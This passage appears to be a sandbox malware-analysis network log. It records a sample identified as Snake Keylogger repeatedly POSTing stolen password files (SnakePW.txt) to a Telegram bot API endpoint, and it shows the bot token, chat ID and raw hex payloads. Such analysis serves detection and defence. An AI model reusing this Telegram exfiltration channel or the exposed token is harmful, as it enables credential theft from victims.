                                                                    2022-06-26 07:33:36 UTC230OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 30 31 65 64 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f701edebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:36 UTC230INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:36 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:36 UTC230INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66898,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228816,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    137192.168.2.549992149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:37 UTC231OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f73feb89
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:37 UTC231OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 33 66 65 62 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f73feb89Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:37 UTC232INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:37 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:37 UTC232INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66899,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228817,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    138192.168.2.549993149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:37 UTC233OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f77b866a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:37 UTC233OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 37 62 38 36 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f77b866aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:37 UTC233INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:37 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:37 UTC234INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66901,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228817,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    139192.168.2.549994149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:37 UTC234OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f7b25b44
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:37 UTC235OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 62 32 35 62 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f7b25b44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:38 UTC235INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:38 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:38 UTC235INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66902,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228818,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    14192.168.2.549782149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:43 UTC23OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d7a1a28a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:43 UTC23OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 61 31 61 32 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d7a1a28aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:44 UTC24INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:44 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:44 UTC24INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66760,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228764,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    140192.168.2.549995149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:38 UTC236OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f7edf6c4
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:38 UTC236OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 65 64 66 36 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f7edf6c4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:38 UTC237INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:38 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:38 UTC237INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66903,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228818,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    141192.168.2.549996149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:38 UTC238OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f82bf373
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:38 UTC238OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 32 62 66 33 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f82bf373Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:38 UTC238INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:38 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:38 UTC239INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66904,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228818,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    142192.168.2.549997149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:38 UTC239OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f86067ac
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
